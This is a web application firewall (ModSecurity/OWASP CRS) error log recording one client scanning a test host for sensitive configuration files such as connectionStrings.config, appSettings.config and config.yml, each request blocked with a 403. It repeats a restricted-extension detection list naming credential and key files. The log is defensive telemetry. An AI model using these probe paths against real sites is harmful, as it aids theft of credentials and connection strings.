[Fri Jan 16 03:18:28.785858 2026] [:error] [pid 1444034] [client 45.148.10.246:45246] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Web.Debug.config"] [unique_id "aWmf9ORfEYyDES-ZFL4hygAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./Web.Debug.config
[Fri Jan 16 03:18:28.786213 2026] [:error] [pid 1444034] [client 45.148.10.246:45246] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Web.Debug.config"] [unique_id "aWmf9ORfEYyDES-ZFL4hygAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./Web.Debug.config
[Fri Jan 16 03:18:28.786390 2026] [:error] [pid 1444034] [client 45.148.10.246:45246] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/Web.Debug.config"] [unique_id "aWmf9ORfEYyDES-ZFL4hygAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./Web.Debug.config
[Fri Jan 16 03:18:28.943420 2026] [:error] [pid 1444035] [client 45.148.10.246:45262] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/appSettings.config"] [unique_id "aWmf9LauW6yeGWXfDeFXMwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/appSettings.config
[Fri Jan 16 03:18:28.943739 2026] [:error] [pid 1444035] [client 45.148.10.246:45262] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/appSettings.config"] [unique_id "aWmf9LauW6yeGWXfDeFXMwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/appSettings.config
[Fri Jan 16 03:18:28.943915 2026] [:error] [pid 1444035] [client 45.148.10.246:45262] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/appSettings.config"] [unique_id "aWmf9LauW6yeGWXfDeFXMwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/appSettings.config
[Fri Jan 16 03:18:29.334198 2026] [:error] [pid 1444040] [client 45.148.10.246:45268] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/appSettings.config"] [unique_id "aWmf9fn_5sIyKhJ5GAzZmwAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//appSettings.config
[Fri Jan 16 03:18:29.334543 2026] [:error] [pid 1444040] [client 45.148.10.246:45268] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/appSettings.config"] [unique_id "aWmf9fn_5sIyKhJ5GAzZmwAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//appSettings.config
[Fri Jan 16 03:18:29.334698 2026] [:error] [pid 1444040] [client 45.148.10.246:45268] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/appSettings.config"] [unique_id "aWmf9fn_5sIyKhJ5GAzZmwAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//appSettings.config
[Fri Jan 16 03:18:29.467946 2026] [:error] [pid 1444032] [client 45.148.10.246:54252] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/appSettings.config"] [unique_id "aWmf9ekMvq8uPO2ZciWpzAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./appSettings.config
[Fri Jan 16 03:18:29.468274 2026] [:error] [pid 1444032] [client 45.148.10.246:54252] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/appSettings.config"] [unique_id "aWmf9ekMvq8uPO2ZciWpzAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./appSettings.config
[Fri Jan 16 03:18:29.468431 2026] [:error] [pid 1444032] [client 45.148.10.246:54252] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/appSettings.config"] [unique_id "aWmf9ekMvq8uPO2ZciWpzAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./appSettings.config
[Fri Jan 16 03:18:29.670664 2026] [:error] [pid 1444226] [client 45.148.10.246:54262] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/connectionStrings.config"] [unique_id "aWmf9WcpoCUgeFICb0be0gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/connectionStrings.config
[Fri Jan 16 03:18:29.671006 2026] [:error] [pid 1444226] [client 45.148.10.246:54262] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/connectionStrings.config"] [unique_id "aWmf9WcpoCUgeFICb0be0gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/connectionStrings.config
[Fri Jan 16 03:18:29.671173 2026] [:error] [pid 1444226] [client 45.148.10.246:54262] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/connectionStrings.config"] [unique_id "aWmf9WcpoCUgeFICb0be0gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/connectionStrings.config
[Fri Jan 16 03:18:29.957956 2026] [:error] [pid 1444035] [client 45.148.10.246:54270] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/connectionStrings.config"] [unique_id "aWmf9bauW6yeGWXfDeFXNAAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//connectionStrings.config
[Fri Jan 16 03:18:29.958282 2026] [:error] [pid 1444035] [client 45.148.10.246:54270] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/connectionStrings.config"] [unique_id "aWmf9bauW6yeGWXfDeFXNAAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//connectionStrings.config
[Fri Jan 16 03:18:29.958462 2026] [:error] [pid 1444035] [client 45.148.10.246:54270] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/connectionStrings.config"] [unique_id "aWmf9bauW6yeGWXfDeFXNAAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//connectionStrings.config
[Fri Jan 16 03:18:30.114333 2026] [:error] [pid 1444033] [client 45.148.10.246:54276] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/connectionStrings.config"] [unique_id "aWmf9tLJkp65ULFQ2YYiOAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./connectionStrings.config
[Fri Jan 16 03:18:30.114696 2026] [:error] [pid 1444033] [client 45.148.10.246:54276] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/connectionStrings.config"] [unique_id "aWmf9tLJkp65ULFQ2YYiOAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./connectionStrings.config
[Fri Jan 16 03:18:30.114864 2026] [:error] [pid 1444033] [client 45.148.10.246:54276] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/connectionStrings.config"] [unique_id "aWmf9tLJkp65ULFQ2YYiOAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./connectionStrings.config
[Fri Jan 16 03:18:30.306524 2026] [:error] [pid 1444040] [client 45.148.10.246:54288] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/mailSettings.config"] [unique_id "aWmf9vn_5sIyKhJ5GAzZnAAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/mailSettings.config
[Fri Jan 16 03:18:30.306902 2026] [:error] [pid 1444040] [client 45.148.10.246:54288] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/mailSettings.config"] [unique_id "aWmf9vn_5sIyKhJ5GAzZnAAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/mailSettings.config
[Fri Jan 16 03:18:30.307065 2026] [:error] [pid 1444040] [client 45.148.10.246:54288] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/mailSettings.config"] [unique_id "aWmf9vn_5sIyKhJ5GAzZnAAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/mailSettings.config
[Fri Jan 16 03:18:30.666439 2026] [:error] [pid 1444226] [client 45.148.10.246:54302] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/mailSettings.config"] [unique_id "aWmf9mcpoCUgeFICb0be0wAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//mailSettings.config
[Fri Jan 16 03:18:30.666765 2026] [:error] [pid 1444226] [client 45.148.10.246:54302] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/mailSettings.config"] [unique_id "aWmf9mcpoCUgeFICb0be0wAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//mailSettings.config
[Fri Jan 16 03:18:30.666910 2026] [:error] [pid 1444226] [client 45.148.10.246:54302] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/mailSettings.config"] [unique_id "aWmf9mcpoCUgeFICb0be0wAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//mailSettings.config
[Fri Jan 16 03:18:30.815345 2026] [:error] [pid 1444034] [client 45.148.10.246:54310] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/mailSettings.config"] [unique_id "aWmf9uRfEYyDES-ZFL4hzAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./mailSettings.config
[Fri Jan 16 03:18:30.815678 2026] [:error] [pid 1444034] [client 45.148.10.246:54310] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/mailSettings.config"] [unique_id "aWmf9uRfEYyDES-ZFL4hzAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./mailSettings.config
[Fri Jan 16 03:18:30.815838 2026] [:error] [pid 1444034] [client 45.148.10.246:54310] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/mailSettings.config"] [unique_id "aWmf9uRfEYyDES-ZFL4hzAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./mailSettings.config
[Fri Jan 16 03:18:33.657665 2026] [:error] [pid 1444226] [client 45.148.10.246:54476] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/config/config.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/config.yml found within REQUEST_FILENAME: /config/config.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/config.yml"] [unique_id "aWmf-WcpoCUgeFICb0be1gAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/config/config.yml
